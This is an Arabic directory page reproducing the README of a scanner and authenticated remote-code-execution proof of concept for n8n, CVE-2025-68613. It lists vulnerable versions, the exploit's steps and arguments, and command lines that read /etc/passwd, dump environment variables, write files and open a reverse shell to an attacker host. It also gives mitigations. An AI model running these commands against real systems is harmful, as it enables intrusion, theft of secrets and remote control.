Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
n8n-cve-2025-68613 — PoC لاستغلال RCE مصادق عليه وماسح ضوئي للثغرات لـ CVE-2025-68613 في n8n. يدعم تنفيذ الأوامر، وعمليات الملفات، وحمولات الصدفة العكسية لاختبار الأمان المصرح به. | Kitploit
أدوات/GitHubGitHub/gagaltotal/n8n-cve-2025-68613
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubgagaltotal/n8n-cve-2025-68613

n8n-cve-2025-68613

PoC لاستغلال RCE مصادق عليه وماسح ضوئي للثغرات لـ CVE-2025-68613 في n8n. يدعم تنفيذ الأوامر، وعمليات الملفات، وحمولات الصدفة العكسية لاختبار الأمان المصرح به.

عرض المستودع
10منذ 8 أشهرلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-68613 – حقن تعبير n8n يؤدي إلى تنفيذ أوامر عن بعد (RCE)

Python Security CVE Status

توفر هذه المجموعة أدوات ماسح ضوئي وإثبات مفهوم (PoC) للثغرة الحرجة CVE-2025-68613 في منصة أتمتة سير العمل n8n.

يقدم هذا المستودع نصوص الماسح الضوئي وإثبات المفهوم (PoC) للثغرة الحرجة CVE-2025-68613 التي تؤثر على منصة أتمتة سير العمل n8n.


تحذير / تنبيه

باللغة العربية

هذه الأداة مخصصة فقط لاختبارات الأمان المشروعة والمرخصة.
يمنع استخدام هذه الأداة على أي نظام دون إذن المالك.

باللغة الإنجليزية

This tool is ONLY for authorized and legal security testing.
Unauthorized usage is illegal and prohibited.


نظرة عامة على الثغرة

  • معرف CVE : CVE-2025-68613
  • الخطورة : حرجة
  • CVSS : 10.0
  • النوع : حقن تعبير → تنفيذ أوامر عن بعد (RCE)
  • المنتج : منصة أتمتة سير العمل n8n

الإصدارات المعرضة للخطر

  • 0.211.0 – 1.120.3
  • 1.121.0

الإصدارات المصححة

  • 1.120.4+
  • 1.121.1+
  • 1.122.0+

هيكل المستودع

root@kitploit:~
.
├── tot-scanner-2025-68613.py   # ماسح الثغرات (بدون استغلال)
├── tot-exploit-2025-68613.py   # إثبات مفهوم لاستغلال RCE (مصادق)
├── requirements.txt
└── README.md

الماسح الضوئي (بدون استغلال)

يستخدم الماسح الضوئي من أجل:

  • كشف خدمة n8n
  • استخراج إصدار n8n
  • تحديد حالة الثغرة
  • لا يقوم بأي استغلال
  • يدعم مخرجات بصيغة JSON

The scanner:

  • يكتشف خدمة n8n
  • يستخرج إصدار n8n
  • يحدد حالة الثغرة
  • لا يقوم بأي استغلال
  • يدعم مخرجات بصيغة JSON

يتحقق الماسح من نقاط النهاية التالية:

  • /
  • /rest/settings
  • /healthz
  • /api/v1/health

التبعيات / المتطلبات

باللغة العربية

الحزم المطلوبة:

  • requests

محتويات ملف requirements.txt:

root@kitploit:~
requests>=2.28.0

باللغة الإنجليزية

Required packages:

  • requests

requirements.txt content:

root@kitploit:~
requests>=2.28.0

التثبيت

root@kitploit:~
pip install -r requirements.txt

استخدام الماسح الضوئي

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678

وضع JSON للماسح الضوئي

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json

مثال لمخرجات الماسح الضوئي بصيغة JSON

root@kitploit:~
{
  "target": "http://target.com:5678",
  "detected": true,
  "version": "1.121.0",
  "vulnerable": true,
  "status": "vulnerable",
  "cve": "CVE-2025-68613"
}

رموز الخروج للماسح الضوئي

Codeالمعنى
0غير معرض للخطر
1الإصدار غير معروف
2معرض للخطر

استغلال RCE (إثبات مفهوم مع المصادقة)

هذا الاستغلال يتطلب بيانات اعتماد n8n صالحة
مطلوب وصول مصادق عليه

يعمل الاستغلال كالتالي:

  1. تسجيل الدخول إلى n8n
  2. إنشاء سير عمل
  3. إدخال تعبير خبيث في عقدة Set
  4. تشغيل سير العمل
  5. (اختياري) تنظيف سير العمل

وسائط الاستغلال

الوسيطةمطلوبةالوصف
-u / --url✅رابط n8n الهدف
-e / --email✅البريد الإلكتروني لحساب n8n
-p / --password✅كلمة مرور حساب n8n
--payload✅نوع الحمولة
--command❌أمر نظام التشغيل (cmd)
--file❌مسار الملف (read/write)
--content❌محتوى الملف (write)
--lhost❌عنوان المهاجم (revshell)
--lport❌منفذ المهاجم (revshell)
--verify-ssl❌التحقق من شهادة SSL

الحمولات المدعومة

الحمولةالوظيفة
infoمعلومات النظام
cmdتنفيذ الأوامر
envتفريغ متغيرات البيئة
readقراءة ملف
writeكتابة ملف
revshellشل عكسي

لقطة شاشة

أمثلة على استخدام الاستغلال

معلومات النظام

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload info

تنفيذ الأمر

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload cmd  --command "id"

قراءة ملف

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload read  --file /etc/passwd

كتابة ملف

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload write  --file /tmp/pwned.txt  --content "owned"

شل عكسي

root@kitploit:~
nc -lvnp 4444
root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload revshell  --lhost 10.10.14.5  --lport 4444

التخفيف

  • ترقية n8n إلى الإصدارات المصححة
  • تقييد الوصول إلى نقاط النهاية /rest/*
  • فرض التحكم في الوصول المستند إلى الأدوار (RBAC) والمصادقة القوية
  • مراجعة سير العمل غير المعروف

إخلاء مسؤولية

يتم توفير هذا المشروع لأغراض تعليمية واختبارات أمان مرخصة فقط.
المؤلف غير مسؤول عن أي استخدام خاطئ.


وسوم جيتهاب

root@kitploit:~
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python

ابق قانونيًا. ابق أخلاقيًا.

تنزيل الأداة